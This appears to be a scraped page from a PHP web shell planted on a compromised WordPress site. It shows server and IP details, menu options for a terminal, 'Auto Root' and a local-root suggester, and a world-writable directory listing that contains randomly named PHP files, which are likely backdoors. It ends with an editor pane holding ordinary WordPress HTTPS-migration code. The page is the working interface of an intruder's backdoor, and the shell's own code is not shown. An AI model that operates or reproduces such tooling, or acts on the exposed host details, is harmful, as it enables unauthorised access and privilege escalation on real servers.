Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 13.59.48.34
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
theprintave /
wp-includes /
SimplePie /
wp /
Delete
Unzip
Name
Size
Permission
Date
Action
Enclosure.php
32.25
KB
-rwxrwxrwx
2024-11-13 12:36
VRobkq.php
34.65
KB
-rwxrwxrwx
2025-05-09 05:54
autosave.min.js
5.67
KB
-rwxrwxrwx
2023-02-02 16:36
block-bindings.php
5.46
KB
-rwxrwxrwx
2024-07-16 17:55
class-wp-dependencies.php
14.78
KB
-rwxrwxrwx
2024-11-13 12:36
class-wp-hook.php
15.63
KB
-rwxrwxrwx
2023-09-18 12:41
class-wp-rewrite.php
62.2
KB
-rwxrwxrwx
2024-11-13 12:36
class-wp.php
25.7
KB
-rwxrwxrwx
2025-04-15 17:44
codemirror.min.css
15.53
KB
-rwxrwxrwx
2017-09-13 06:08
customize-preview.min-20250514002326.js
10.45
KB
-rwxrwxrwx
2023-02-02 16:36
customize-views-20250513213247.js
4.95
KB
-rwxrwxrwx
2018-06-28 02:30
edit-site.min.js
626.11
KB
-rwxrwxrwx
2025-04-15 17:44
handlers.min.js
1.25
KB
-rwxrwxrwx
2017-09-21 16:35
http.php
24.72
KB
-rwxrwxrwx
2025-05-09 07:39
https-migration-20250514045752.php
4.63
KB
-rwxrwxrwx
2023-07-10 22:38
jquery.Jcrop.min.js
22.06
KB
-rwxrwxrwx
2022-03-24 20:07
pluggable-deprecated.php
6.18
KB
-rwxrwxrwx
2025-04-15 17:44
plugin.php
34.74
KB
-rwxrwxrwx
2024-07-16 17:55
plupload-20250514002206.js
58.9
KB
-rwxrwxrwx
2019-11-03 17:09
post-terms.php
3.55
KB
-rwxrwxrwx
2025-04-15 17:44
private-apis-20250514002209.js
8.3
KB
-rwxrwxrwx
2025-04-15 17:44
private-apis.min-20250514003319.js
2.75
KB
-rwxrwxrwx
2025-04-15 17:44
robots-template-20250514074748.php
5.06
KB
-rwxrwxrwx
2022-04-06 15:33
rss.php
22.57
KB
-rwxrwxrwx
2024-11-13 12:36
sUUyBfCpZ.php
166.01
KB
-rwxrwxrwx
2025-05-09 05:54
wp-db.php
445
B
-rwxrwxrwx
2022-07-21 22:45
wp-mediaelement-20250514002653.js
2.69
KB
-rwxrwxrwx
2023-02-07 16:00
Save
Rename
<?php /** * HTTPS migration functions. * * @package WordPress * @since 5.7.0 */ /** * Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart. * * If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to * add frontend filters to replace insecure site URLs that may be present in older database content. The * {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior. * * @since 5.7.0 * * @return bool True if insecure URLs should replaced, false otherwise. */ function wp_should_replace_insecure_home_url() { $should_replace_insecure_home_url = wp_is_using_https() && get_option( 'https_migration_required' ) // For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using // the same domain. && wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST ); /** * Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart. * * If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can * be used to disable that behavior, e.g. after having replaced URLs manually in the database. * * @since 5.7.0 * * @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced. */ return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url ); } /** * Replaces insecure HTTP URLs to the site in the given content, if configured to do so. * * This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if * determined via {@see wp_should_replace_insecure_home_url()}. * * @since 5.7.0 * * @param string $content Content to replace URLs in. * @return string Filtered content. */ function wp_replace_insecure_home_url( $content ) { if ( ! wp_should_replace_insecure_home_url() ) { return $content; } $https_url = home_url( '', 'https' ); $http_url = str_replace( 'https://', 'http://', $https_url ); // Also replace potentially escaped URL. $escaped_https_url = str_replace( '/', '\/', $https_url ); $escaped_http_url = str_replace( '/', '\/', $http_url ); return str_replace( array( $http_url, $escaped_http_url, ), array( $https_url, $escaped_https_url, ), $content ); } /** * Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL. * * If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants * overriding the URLs used), the changes will be reverted. In such a case the function will return false. * * @since 5.7.0 * * @return bool True on success, false on failure. */ function wp_update_urls_to_https() { // Get current URL options. $orig_home = get_option( 'home' ); $orig_siteurl = get_option( 'siteurl' ); // Get current URL options, replacing HTTP with HTTPS. $home = str_replace( 'http://', 'https://', $orig_home ); $siteurl = str_replace( 'http://', 'https://', $orig_siteurl ); // Update the options. update_option( 'home', $home ); update_option( 'siteurl', $siteurl ); if ( ! wp_is_using_https() ) { /* * If this did not result in the site recognizing HTTPS as being used, * revert the change and return false. */ update_option( 'home', $orig_home ); update_option( 'siteurl', $orig_siteurl ); return false; } // Otherwise the URLs were successfully changed to use HTTPS. return true; } /** * Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS. * * If this is a fresh site, a migration will not be required, so the option will be set as `false`. * * This is hooked into the {@see 'update_option_home'} action. * * @since 5.7.0 * @access private * * @param mixed $old_url Previous value of the URL option. * @param mixed $new_url New value of the URL option. */ function wp_update_https_migration_required( $old_url, $new_url ) { // Do nothing if WordPress is being installed. if ( wp_installing() ) { return; } // Delete/reset the option if the new URL is not the HTTPS version of the old URL. if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) { delete_option( 'https_migration_required' ); return; } // If this is a fresh site, there is no content to migrate, so do not require migration. $https_migration_required = get_option( 'fresh_site' ) ? false : true; update_option( 'https_migration_required', $https_migration_required ); }